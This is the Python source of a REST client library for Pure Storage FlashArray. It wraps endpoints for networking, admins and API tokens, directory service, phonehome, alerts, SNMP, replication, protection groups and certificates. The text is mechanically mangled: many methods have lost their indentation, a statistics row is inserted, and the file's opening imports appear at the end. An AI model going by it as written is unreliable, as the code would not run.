    return self._request("GET", "network")
def set_network_interface(self, interface, **kwargs):
    """Set attributes of a network interface
    (see **PUT network/:network_component**).

    :param interface: Name of network interface for which to set attribute.
    :type interface: str
    :returns: A dictionary describing the interface.
    :rtype: ResponseDict
    """
    return self._request("PUT", "network/%s" % interface, kwargs)
def create_subnet(self, subnet, prefix, **kwargs):
    """Create a subnet.

    :param subnet: Name of subnet to be created.
    :type subnet: str
    :param prefix: Routing prefix as an IPv4 CIDR address
        ("xxx.xxx.xxx.xxx/nn").
    :type prefix: str
    :returns: A dictionary describing the created subnet.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.5 or later.
    """
    payload = dict(prefix=prefix)
    payload.update(kwargs)
    return self._request("POST", "subnet/%s" % subnet, payload)
def delete_subnet(self, subnet):
    """Delete a subnet.

    :param subnet: Name of the subnet to be deleted.
    :type subnet: str
    :returns: A dictionary mapping "name" to subnet.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.5 or later.
    """
    return self._request("DELETE", "subnet/%s" % subnet)
def disable_subnet(self, subnet):
    """Disable a subnet.

    :param subnet: Name of subnet to be disabled.
    :type subnet: str
    :returns: A dictionary describing the subnet.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.5 or later.
    """
    return self.set_subnet(subnet, enabled=False)
def enable_subnet(self, subnet):
    """Enable a subnet.

    :param subnet: Name of subnet to be enabled.
    :type subnet: str
    :returns: A dictionary describing the subnet.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.5 or later.
    """
    return self.set_subnet(subnet, enabled=True)
def get_subnet(self, subnet):
    """Describe a subnet.

    :param subnet: Name of the subnet to get information about.
    :type subnet: str
    :returns: A dictionary describing the subnet.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.5 or later.
    """
    return self._request("GET", "subnet/%s" % subnet)
def list_subnets(self, **kwargs):
    """List subnets (see **GET subnet** in the REST API Guide).

    :returns: A list of dictionaries, one per subnet.
    :rtype: ResponseList

    .. note::
        Requires use of REST API 1.5 or later.
    """
    return self._request("GET", "subnet", kwargs)
def rename_subnet(self, subnet, name):
    """Give a subnet a new name.

    :param subnet: Current name of the subnet.
    :type subnet: str
    :param name: New name for the subnet.
    :type name: str
    :returns: A dictionary describing the renamed subnet.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.5 or later.
    """
    return self.set_subnet(subnet, name=name)
def set_subnet(self, subnet, **kwargs):
    """Set attributes of a subnet (see **PUT subnet/:subnet**).

    :param subnet: Name of subnet for which to set attribute.
    :type subnet: str
    :returns: A dictionary describing the subnet.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.5 or later.
    """
    return self._request("PUT", "subnet/%s" % subnet, kwargs)
def create_vlan_interface(self, interface, subnet, **kwargs):
    """Create a VLAN interface on a subnet.

    :param interface: Name of interface to be created.
    :type interface: str
    :param subnet: Subnet associated with the interface to be created.
    :type subnet: str
    :returns: A dictionary describing the created interface.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.5 or later.
    """
    payload = dict(subnet=subnet)
    payload.update(kwargs)
    return self._request("POST", "network/vif/%s" % interface, payload)
def delete_vlan_interface(self, interface):
    """Delete a VLAN interface.

    :param interface: Name of the interface to be deleted.
    :type interface: str
    :returns: A dictionary mapping "name" to interface.
    :rtype: ResponseDict

    .. note::
        Requires use of REST API 1.5 or later.
    """
    return self._request("DELETE", "network/%s" % interface)
# DNS methods
def get_dns(self):
    """Return the array's current DNS settings.

    :rtype: ResponseDict
    """
    return self._request("GET", "dns")
def set_dns(self, **kwargs):
    """Change DNS settings (see **PUT dns** in the REST API Guide).

    :returns: A dictionary describing the current DNS settings.
    :rtype: ResponseDict
    """
    return self._request("PUT", "dns", kwargs)
# ports
def list_ports(self, **kwargs):
    """List SAN ports (see **GET port** in the REST API Guide).

    :returns: A list of dictionaries, one per port.
    :rtype: ResponseList
    """
    return self._request("GET", "port", kwargs)
#
# Hardware management methods
#
def get_drive(self, drive):
    """Describe a drive.

    :param drive: Name of drive to get information about.
    :type drive: str
    :returns: A dictionary describing drive.
    :rtype: ResponseDict
    """
    return self._request("GET", "drive/%s" % drive)
def list_drives(self):
    """List the array's SSD and NVRAM modules.

    :returns: A list of dictionaries, one per drive.
    :rtype: ResponseList
    """
    return self._request("GET", "drive")
def get_hardware(self, component, **kwargs):
"""Returns a dictionary describing a hardware component.
:param component: Name of hardware component to get information about.
:type component: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET hardware/:component**
:type \*\*kwargs: optional
:returns: A dictionary describing component.
:rtype: ResponseDict
"""
return self._request("GET", "hardware/{0}".format(component), kwargs)
def list_hardware(self, **kwargs):
"""Returns a list of dictionaries describing hardware.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET hardware**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each hardware component.
:rtype: ResponseList
"""
return self._request("GET", "hardware", kwargs)
def set_hardware(self, component, **kwargs):
"""Set an attribute of a hardware component.
:param component: Name of component for which to set attribute.
:type component: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT hardware/:component**
:type \*\*kwargs: optional
:returns: A dictionary describing component.
:rtype: ResponseDict
"""
return self._request("PUT", "hardware/{0}".format(component), kwargs)
#
# User-management methods
#
    def _list_admin(self, **kwargs):
        """Return a list of dictionaries describing remote access.

        For the arguments you can provide to this method, see the REST API Guide
        on your array for the documentation on the request:
        GET admin.
        """
        # Thin private wrapper; public helpers (list_publickeys,
        # list_api_tokens) funnel through here with preset filters.
        return self._request("GET", "admin", kwargs)
    def _set_admin(self, admin, **kwargs):
        """Set an attribute of an admin.

        For the arguments you can provide to this method, see the REST API Guide
        on your array for the documentation on the request:
        PUT admin/:user.
        """
        # Shared by set_publickey/set_password/refresh_admin; kwargs become
        # the JSON body of the PUT.
        return self._request("PUT", "admin/{0}".format(admin), kwargs)
def create_api_token(self, admin, **kwargs):
"""Create an API token for an admin.
:param admin: Name of admin for whom to create an API token.
:type admin: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST admin/:admin/apitoken**
:type \*\*kwargs: optional
:returns: A dictionary describing the new API token.
:rtype: ResponseDict
"""
return self._request("POST", "admin/{0}/apitoken".format(admin), kwargs)
def delete_api_token(self, admin):
"""Delete the API token of an admin.
:param admin: Name of admin whose API token is to be deleted.
:type admin: str
:returns: A dictionary mapping "name" to admin and "api_token" to None.
:rtype: ResponseDict
"""
return self._request("DELETE", "admin/{0}/apitoken".format(admin))
def get_publickey(self, admin):
"""Returns a dictionary describing an admin's public key.
:param admin: Name of admin whose public key to get.
:type admin: str
:returns: A dictionary mapping "name" to admin and "publickey" to "\*\*\*\*".
:rtype: ResponseDict
"""
return self._request("GET", "admin/{0}".format(admin),
{"publickey": True})
def get_api_token(self, admin, **kwargs):
"""Return a dictionary describing an admin's API token.
:param admin: Name of admin whose API token to get.
:type admin: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET admin/:admin/apitoken**
:type \*\*kwargs: optional
:returns: A dictionary describing admin's API token.
:rtype: ResponseDict
"""
return self._request("GET", "admin/{0}/apitoken".format(admin))
def list_publickeys(self):
"""Return a list of dictionaries describing public keys.
:returns: A list of dictionaries mapping "name" to a username and
"publickey" to "\*\*\*\*" for each admin with a public
key set.
:rtype: ResponseList
"""
return self._list_admin(publickey=True)
def list_api_tokens(self, **kwargs):
"""Return a list of dictionaries describing REST API tokens.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET admin**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing the API token of each admin
with an API token set.
:rtype: ResponseList
.. note::
The API tokens are replaced with "\*\*\*\*" unless the parameter
expose is passed as True.
"""
return self._list_admin(api_token=True, **kwargs)
def refresh_admin(self, admin, **kwargs):
"""Refresh the admin permission cache for the specified admin.
:param admin: Name of admin whose permission cache is to be refreshed.
:type admin: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET admin**
:type \*\*kwargs: optional
:returns: A dictionary mapping "name" to admin and "role" to the admin's role.
:rtype: ResponseDict
.. note::
Setting the optional parameter clear to True only clears the
cache without doing an LDAP lookup to get new permissions.
"""
return self._set_admin(admin, action="refresh", **kwargs)
def refresh_admins(self):
"""Clear the admin permission cache.
:returns: A dictionary mapping "name" to "[ALL]" and "role" to None.
:rtype: ResponseDict
.. note::
Does not immediately do any LDAP lookups to get new permissions.
"""
return self._request("PUT", "admin",
{"action": "refresh", "clear": True})
def set_publickey(self, admin, key):
"""Set the public key associated with an admin.
:param admin: Name of admin whose public key is to be set.
:type admin: str
:param key: New public key for admin.
:type key: str
:returns: A dictionary mapping "name" to admin and "publickey"
to "\*\*\*\*"
:rtype: ResponseDict
"""
return self._set_admin(admin, publickey=key)
def set_password(self, admin, new_password, old_password):
"""Set an admin's password.
:param admin: Name of admin whose password is to be set.
:type admin: str
:param new_password: New password for admin.
:type new_password: str
:param old_password: Current password of admin.
:type old_password: str
:returns: A dictionary mapping "name" to admin.
:rtype: ResponseDict
"""
return self._set_admin(admin, password=new_password,
old_password=old_password)
# Directory Service methods
def disable_directory_service(self, check_peer=False):
"""Disable the directory service.
:param check_peer: If True, disables server authenticity
enforcement. If False, disables directory
service integration.
:type check_peer: bool, optional
:returns: A dictionary describing the status of the directory service.
:rtype: ResponseDict
"""
if check_peer:
return self.set_directory_service(check_peer=False)
return self.set_directory_service(enabled=False)
def enable_directory_service(self, check_peer=False):
"""Enable the directory service.
:param check_peer: If True, enables server authenticity
enforcement. If False, enables directory
service integration.
:type check_peer: bool, optional
:returns: A dictionary describing the status of the directory service.
:rtype: ResponseDict
"""
if check_peer:
return self.set_directory_service(check_peer=True)
return self.set_directory_service(enabled=True)
def get_directory_service(self, **kwargs):
"""Return a dictionary describing directory service configuration.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET directoryservice**
:type \*\*kwargs: optional
:returns: A dictionary describing the status of the directory service.
:rtype: ResponseDict
"""
return self._request("GET", "directoryservice", kwargs)
def set_directory_service(self, **kwargs):
"""Set an attribute of the directory service configuration.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT directoryservice**
:type \*\*kwargs: optional
:returns: A dictionary describing the status of the directory service.
:rtype: ResponseDict
"""
return self._request("PUT", "directoryservice", kwargs)
def test_directory_service(self):
"""Test the directory service.
:returns: A dictionary mapping "output" to the output of the directory
service test.
:rtype: ResponseDict
"""
return self.set_directory_service(action="test")
#
# Support related methods
#
    def _set_phonehome(self, **kwargs):
        """Private helper: PUT kwargs as the body of array/phonehome."""
        return self._request("PUT", "array/phonehome", kwargs)
    def _set_remote_assist(self, **kwargs):
        """Private helper: PUT kwargs as the body of array/remoteassist."""
        return self._request("PUT", "array/remoteassist", kwargs)
def disable_phonehome(self):
"""Disable hourly phonehome.
:returns: A dictionary mapping "phonehome" to "disabled".
:rtype: ResponseDict
"""
return self._set_phonehome(enabled=False)
def disable_remote_assist(self):
"""Disable remote assist.
:returns: A dictionary describing the status of the remote assist
connection.
:rtype: ResponseDict
"""
return self._set_remote_assist(action="disconnect")
def enable_phonehome(self):
"""Enable hourly phonehome.
:returns: A dictionary mapping "phonehome" to "enabled".
:rtype: ResponseDict
"""
return self._set_phonehome(enabled=True)
def enable_remote_assist(self):
"""Enable remote assist.
:returns: A dictionary describing the status of the remote assist
connection.
:rtype: ResponseDict
"""
return self._set_remote_assist(action="connect")
def get_manual_phonehome_status(self):
"""Get manually-initiated phonehome status.
:returns: A dictionary describing the current status of a
manually-initiated phonehome.
:rtype: ResponseDict
"""
return self._request("GET", "array/phonehome")
def get_phonehome(self):
"""Return a dictionary describing if hourly phonehome is enabled.
:returns: A dictionary mapping "phonehome" to "enabled" if hourly
phonehome is enabled, mapping to "disabled" otherwise.
:rtype: ResponseDict
"""
return self.get(phonehome=True)
def get_remote_assist_status(self):
"""Return a dictionary describing whether remote assist is enabled.
:returns: A dictionary describing the current status of the remote
assist connection.
:rtype: ResponseDict
"""
return self._request("GET", "array/remoteassist")
def phonehome(self, action):
"""Manually initiate or cancel a phonehome action.
:type action: str
:param action: The timeframe of logs to phonehome or cancel the current
phonehome.
.. note::
action must be one of: ("send_today", "send_yesterday", "send_all", "cancel").
:returns: A dictionary describing the current status of the phonehome request.
:rtype: ResponseDict
"""
return self._set_phonehome(action=action)
#
# Alerts and audit records
#
    def _set_alert_recipient(self, address, **kwargs):
        """Private helper: PUT kwargs as the body of alert/:address."""
        return self._request("PUT", "alert/{0}".format(address), kwargs)
    def _set_message(self, message_id, **kwargs):
        """Private helper: PUT kwargs as the body of message/:message_id."""
        return self._request("PUT", "message/{0}".format(message_id), kwargs)
def clear_message(self, message_id):
"""Clear an alert message or audit record flag.
:param message_id: ID of the message to unflag.
:type message_id: int or str
:returns: A dictionary mapping "id" to message_id.
:rtype: ResponseDict
"""
return self._set_message(message_id, flagged=False)
def create_alert_recipient(self, address):
"""Add an alert recipient.
:param address: Email address of alert recipient to be created.
:type address: str
:returns: A dictionary mapping "name" to address and "enabled" to True.
:rtype: ResponseDict
"""
return self._request("POST", "alert/{0}".format(address))
def delete_alert_recipient(self, address):
"""Delete an alert recipient.
:param address: Email address of alert recipient to be deleted.
:type address: str
:returns: A dictionary mapping "name" to address.
:rtype: ResponseDict
"""
return self._request("DELETE", "alert/{0}".format(address))
def disable_alert_recipient(self, address):
"""Disable alerts to an alert recipient.
:param address: Email address of alert recipient to be disabled.
:type address: str
:returns: A dictionary mapping "name" to address and "enabled" to False.
:rtype: ResponseDict
"""
return self._set_alert_recipient(address, enabled=False)
def enable_alert_recipient(self, address):
"""Enable alerts to an alert recipient.
:param address: Email address of alert recipient to be enabled.
:type address: str
:returns: A dictionary mapping "name" to address and "enabled" to True.
:rtype: ResponseDict
"""
return self._set_alert_recipient(address, enabled=True)
def flag_message(self, message_id):
"""Flag an alert message or audit record.
:param message_id: ID of message to be flagged.
:type message_id: int or str
:returns: A dictionary mapping "id" to message_id.
:rtype: ResponseDict
"""
return self._set_message(message_id, flagged=True)
def get_alert_recipient(self, address):
"""Return a dictionary describing an alert recipient.
:param address: Email address of alert recipient to get information about.
:type address: str
:returns: A dictionary mapping "name" to address and "enabled" to True
if that alert recipient is enabled, False otherwise.
:rtype: ResponseDict
"""
return self._request("GET", "alert/{0}".format(address))
def list_alert_recipients(self):
"""Return a list of dictionaries describing alert recipients.
:returns: A list of dictionaries mapping "name" to a recipient's
address and "enabled" to True if that recipient is enabled,
False otherwise, for each alert recipient.
:rtype: ResponseList
"""
return self._request("GET", "alert")
def list_messages(self, **kwargs):
"""Return a list of alert messages.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET message**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each message.
:rtype: ResponseList
"""
return self._request("GET", "message", kwargs)
def test_alert(self):
"""Send test alerts to all recipients.
:returns: A list of dictionaries describing the test outcome for each
recipient.
:rtype: ResponseList
"""
return self._request("PUT", "alert", {"action": "test"})
def test_alert_recipient(self, address):
"""Send a test alert to the specified recipient.
:param address: Address of recipient of test alert.
:type address: str
:returns: A dictionary describing the test outcome.
:rtype: ResponseDict
"""
return self._set_alert_recipient(address, action="test")
#
# SNMP managers
#
def create_snmp_manager(self, manager, host, **kwargs):
"""Create an SNMP manager.
:param manager: Name of manager to be created.
:type manager: str
:param host: IP address or DNS name of SNMP server to be used.
:type host: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST snmp/:manager**
:type \*\*kwargs: optional
:returns: A dictionary describing the created SNMP manager.
:rtype: ResponseDict
"""
data = {"host": host}
data.update(kwargs)
return self._request("POST", "snmp/{0}".format(manager), data)
def delete_snmp_manager(self, manager):
"""Delete an SNMP manager.
:param manager: Name of SNMP manager to be deleted.
:type manager: str
:returns: A dictionary mapping "name" to manager.
:rtype: ResponseDict
"""
return self._request("DELETE", "snmp/{0}".format(manager))
def get_snmp_engine_id(self):
"""Return the SNMP v3 engine ID generated for the array.
:returns: A dictionary mapping "engine_id" to the array's SNMP engine ID.
:rtype: ResponseDict
.. note::
Requires use of SNMP v3.
"""
return self._request("GET", "snmp", {"engine_id": True})
def get_snmp_manager(self, manager):
"""Return a dictionary describing an SNMP manager.
:param manager: Name of SNMP manager to get information about.
:type manager: str
:returns: A dictionary describing manager.
:rtype: ResponseDict
"""
return self._request("GET", "snmp/{0}".format(manager))
def list_snmp_managers(self):
"""Return a list of dictionaries describing SNMP managers.
:returns: A list of dictionaries describing each SNMP manager.
:rtype: ResponseList
"""
return self._request("GET", "snmp")
def rename_snmp_manager(self, manager, name):
"""Rename an SNMP manager.
:param manager: Current name of the SNMP manager to be renamed.
:type manager: str
:param name: New name of the SNMP manager to be renamed.
:type name: str
:returns: A dictionary describing the renamed SNMP manager.
:rtype: ResponseDict
"""
return self.set_snmp_manager(manager, name=name)
def set_snmp_manager(self, manager, **kwargs):
"""Set an attribute of an SNMP manager.
:param manager: Name of the SNMP manager for which to set an attribute.
:type manager: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT snmp/:manager**
:type \*\*kwargs: optional
:returns: A dictionary describing manager.
:rtype: ResponseDict
"""
return self._request("PUT", "snmp/{0}".format(manager), kwargs)
def test_snmp_manager(self, manager):
"""Send a test trap to a manager.
:param manager: SNMP manager to which to send a test trap.
:type manager: str
:returns: A dictionary mapping "output" to the output of the test.
:rtype: ResponseDict
"""
return self.set_snmp_manager(manager, action="test")
#
# Replication related methods
# Note: These methods only work with REST API 1.2 and later
#
def connect_array(self, address, connection_key, connection_type, **kwargs):
"""Connect this array with another one.
:param address: IP address or DNS name of other array.
:type address: str
:param connection_key: Connection key of other array.
:type connection_key: str
:param connection_type: Type(s) of connection desired.
:type connection_type: list
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST array/connection**
:type \*\*kwargs: optional
:returns: A dictionary describing the connection to the other array.
:rtype: ResponseDict
.. note::
Currently, the only type of connection is "replication".
.. note::
Requires use of REST API 1.2 or later.
"""
data = {"address": address,
"connection_key": connection_key,
"type": connection_type}
data.update(kwargs)
return self._request("POST", "array/connection", data)
def disconnect_array(self, address):
"""Disconnect this array from another one.
:param address: IP address or DNS name of other array.
:type address: str
:returns: A dictionary mapping "name" to address.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("DELETE",
"array/connection/{0}".format(address))
def list_array_connections(self, **kwargs):
"""Return list of connected arrays.
:returns: A list of dictionaries describing each connection to another array.
:rtype: ResponseList
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("GET", "array/connection", kwargs)
def throttle_array_connection(self, address, **kwargs):
"""Set bandwidth limits on a connection.
:param address: IP address or DNS name of other array.
:type address: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT array/connection/:address**
:type \*\*kwargs: optional
:returns: A dictionary describing the connection to the other array.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
return self._request("PUT", "array/connection/{0}".format(address), kwargs)
# Protection group related methods
def create_pgroup(self, pgroup, **kwargs):
"""Create pgroup with specified name.
:param pgroup: Name of pgroup to be created.
:type pgroup: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST pgroup/:pgroup**
:type \*\*kwargs: optional
:returns: A dictionary describing the created pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("POST", "pgroup/{0}".format(pgroup), kwargs)
def create_pgroup_snapshot(self, source, **kwargs):
"""Create snapshot of pgroup from specified source.
:param source: Name of pgroup of which to take snapshot.
:type source: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST pgroup**
:type \*\*kwargs: optional
:returns: A dictionary describing the created snapshot.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
# In REST 1.4, support was added for snapshotting multiple pgroups. As a
# result, the endpoint response changed from an object to an array of
# objects. To keep the response type consistent between REST versions,
# we unbox the response when creating a single snapshot.
result = self.create_pgroup_snapshots([source], **kwargs)
if self._rest_version >= LooseVersion("1.4"):
headers = result.headers
result = ResponseDict(result[0])
result.headers = headers
return result
def create_pgroup_snapshots(self, sources, **kwargs):
"""Create snapshots of pgroups from specified sources.
:param sources: Names of pgroups of which to take snapshots.
:type sources: list of str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST pgroup**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing the created snapshots.
:rtype: ResponseList
.. note::
Requires use of REST API 1.2 or later.
"""
data = {"source": sources, "snap": True}
data.update(kwargs)
return self._request("POST", "pgroup", data)
def destroy_pgroup(self, pgroup):
"""Destroy an existing pgroup.
:param pgroup: Name of pgroup to be destroyed.
:type pgroup: str
:returns: A dictionary mapping "name" to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("DELETE", "pgroup/{0}".format(pgroup))
def disable_pgroup_replication(self, pgroup):
"""Disable replication schedule for pgroup.
:param pgroup: Name of pgroup for which to disable replication schedule.
:type pgroup: str
:returns: A dictionary describing pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, replicate_enabled=False)
def enable_pgroup_replication(self, pgroup):
"""Enable replication schedule for pgroup.
:param pgroup: Name of pgroup for which to enable replication schedule.
:type pgroup: str
:returns: A dictionary describing pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, replicate_enabled=True)
    def disable_pgroup_snapshots(self, pgroup):
        """Disable snapshot schedule for pgroup.

        :param pgroup: Name of pgroup for which to disable snapshot schedule.
        :type pgroup: str
        :returns: A dictionary describing pgroup.
        :rtype: ResponseDict

        .. note::

            Requires use of REST API 1.2 or later.

        """
        return self.set_pgroup(pgroup, snap_enabled=False)
def enable_pgroup_snapshots(self, pgroup):
"""Enable snapshot schedule for pgroup.
:param pgroup: Name of pgroup for which to enable snapshot schedule.
:type pgroup: str
:returns: A dictionary describing pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, snap_enabled=True)
def eradicate_pgroup(self, pgroup):
"""Eradicate a destroyed pgroup.
:param pgroup: Name of pgroup to be eradicated.
:type pgroup: str
:returns: A dictionary mapping "name" to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("DELETE", "pgroup/{0}".format(pgroup),
{"eradicate": True})
def get_pgroup(self, pgroup, **kwargs):
"""Return dictionary describing a pgroup or snapshot.
:param pgroup: Name of pgroup to get information about.
:type pgroup: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET pgroup**
:type \*\*kwargs: optional
:returns: A list describing snapshots of the pgroup if the paramater
snap is passed as True, else a dictionary describing the
pgroup.
:rtype: ResponseDict or ResponseList
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("GET", "pgroup/{0}".format(pgroup), kwargs)
def list_pgroups(self, **kwargs):
"""Return list dictionaries describing each pgroup.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET pgroup**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each pgroup.
:rtype: ResponseList
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("GET", "pgroup", kwargs)
def recover_pgroup(self, pgroup):
"""Recover a destroyed pgroup that has not yet been eradicated.
:param pgroup: Name of pgroup to be recovered.
:type pgroup: str
:returns: A dictionary mapping "name" to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, action="recover")
def rename_pgroup(self, pgroup, name):
"""Rename a pgroup.
:param pgroup: Current name of pgroup to be renamed.
:type pgroup: str
:param name: New name of pgroup to be renamed.
:type name: str
:returns: A dictionary mapping "name" to name.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, name=name)
def set_pgroup(self, pgroup, **kwargs):
"""Set an attribute of a pgroup.
:param pgroup: Name of pgroup for which to set attribute.
:type pgroup: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT pgroup/:pgroup**
:type \*\*kwargs: optional
:returns: A dictionary describing pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("PUT", "pgroup/{0}".format(pgroup), kwargs)
#
# SSL Certificate related methods.
# Note: These methods only work with REST API 1.3 and later
#
def get_certificate(self, **kwargs):
"""Get the attributes of the current array certificate.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET cert**
:type \*\*kwargs: optional
:returns: A dictionary describing the configured array certificate.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.3 or later.
"""
return self._request("GET", "cert", kwargs)
def get_certificate_signing_request(self, **kwargs):
"""Construct a certificate signing request (CSR) for signing by a
certificate authority (CA).
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET cert/certificate_signing_request**
:type \*\*kwargs: optional
:returns: A dictionary mapping "certificate_signing_request" to the CSR.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.3 or later.
"""
return self._request("GET", "cert/certificate_signing_request", kwargs)
def set_certificate(self, **kwargs):
"""Create a self-signed certificate or imports a certificate signed
by a certificate authority (CA).
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT cert**
:type \*\*kwargs: optional
:returns: A dictionary describing the configured array certificate.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.3 or later.
"""
return self._request("PUT", "cert", kwargs)
    @staticmethod
    def page_through(page_size, function, *args, **kwargs):
        """Return an iterator over all pages of a REST operation.

        :param page_size: Number of elements to retrieve per call.
        :param function: FlashArray function that accepts limit as an argument.
        :param \*args: Positional arguments to be passed to function.
        :param \*\*kwargs: Keyword arguments to be passed to function.
        :returns: An iterator of tuples containing a page of results for the
                  function(\*args, \*\*kwargs) and None, or None and a PureError
                  if a call to retrieve a page fails.
        :rtype: iterator

        .. note::

            Requires use of REST API 1.7 or later.

            Only works with functions that accept limit as an argument.

            Iterator will retrieve page_size elements per call

            Iterator will yield None and an error if a call fails. The next
            call will repeat the same call, unless the caller sends in an
            alternate page token.

        """
        # Fix the page size once; each page call copies kwargs and adds only
        # the continuation token.
        kwargs["limit"] = page_size
        def get_page(token):
            page_kwargs = kwargs.copy()
            if token:
                page_kwargs["token"] = token
            return function(*args, **page_kwargs)
        def page_generator():
            token = None
            while True:
                try:
                    # The array returns the next continuation token in the
                    # x-next-token response header.
                    response = get_page(token)
                    token = response.headers.get("x-next-token")
                except PureError as err:
                    # Surface the error but keep the generator alive so the
                    # caller can retry the same page.
                    yield None, err
                else:
                    if response:
                        # Callers may send() a replacement token to jump to a
                        # different page instead of following x-next-token.
                        sent_token = yield response, None
                        if sent_token is not None:
                            token = sent_token
                    else:
                        # An empty page means iteration is complete.
                        return
        return page_generator()
#
# App management methods
#
def get_app(self, app):
"""Get app attributes.
:param app: Name of app to get information about.
:type app: str
:returns: A dictionary describing app.
:rtype: ResponseDict
"""
return self._request("GET", "app/{0}".format(app))
def list_apps(self, **kwargs):
"""Returns a list of dictionaries describing apps.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET app**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each app.
:rtype: ResponseList
"""
return self._request("GET", "app", kwargs)
class ResponseList(list):
    """List subclass returned by FlashArray methods.

    :ivar dict headers: The headers returned in the request.
    """

    def __init__(self, l=()):
        # Behave exactly like list(l), then attach empty header storage
        # which _request fills in after decoding the response.
        super(ResponseList, self).__init__(l)
        self.headers = {}
class ResponseDict(dict):
    """Dict subclass returned by FlashArray methods.

    :ivar dict headers: The headers returned in the request.
    """

    def __init__(self, d=()):
        # Behave exactly like dict(d), then attach empty header storage
        # which _request fills in after decoding the response.
        super(ResponseDict, self).__init__(d)
        self.headers = {}
class PureError(Exception):
    """Base exception raised by the FlashArray client.

    :param reason: A message describing why the error occurred.
    :type reason: str

    :ivar str reason: A message describing why the error occurred.
    """

    def __init__(self, reason):
        super(PureError, self).__init__()
        self.reason = reason

    def __str__(self):
        return "PureError: {0}".format(self.reason)
class PureHTTPError(PureError):
    """Error raised when the array answers with a non-200 status code.

    :param target: IP or DNS name of the array that received the HTTP request.
    :type target: str
    :param rest_version: The REST API version that was used when making the
                         request.
    :type rest_version: str
    :param response: The response of the HTTP request that caused the error.
    :type response: :class:`requests.Response`

    :ivar str target: IP or DNS name of the array that received the HTTP request.
    :ivar str rest_version: The REST API version that was used when making the
                            request.
    :ivar int code: The HTTP response status code of the request.
    :ivar dict headers: A dictionary containing the header information. Keys are
                        case-insensitive.
    :ivar str reason: The textual reason for the HTTP status code
                      (e.g. "BAD REQUEST").
    :ivar str text: The body of the response which may contain a message
                    explaining the error.

    .. note::

        The error message in text is not guaranteed to be consistent across REST
        versions, and thus should not be programmed against.

    """

    def __init__(self, target, rest_version, response):
        super(PureHTTPError, self).__init__(response.reason)
        self.target = target
        self.rest_version = rest_version
        # Snapshot the interesting response fields so the exception stays
        # useful even after the response object is gone.
        self.code = response.status_code
        self.headers = response.headers
        self.text = response.text

    def __str__(self):
        template = ("PureHTTPError status code {0} returned by REST "
                    "version {1} at {2}: {3}\n{4}")
        return template.format(self.code, self.rest_version, self.target,
                               self.reason, self.text)
| 32.207913 | 91 | 0.589989 |
import json
import requests
from distutils.version import LooseVersion
VERSION = "1.11.3"
class FlashArray(object):
    """REST client for a Pure Storage FlashArray.

    Handles credential validation, REST version negotiation, session
    cookies, and JSON encoding/decoding for all array endpoints.
    """

    # REST API versions this client library can speak, newest first.
    # Compared against the versions the array reports when negotiating.
    supported_rest_versions = [
        "1.11",
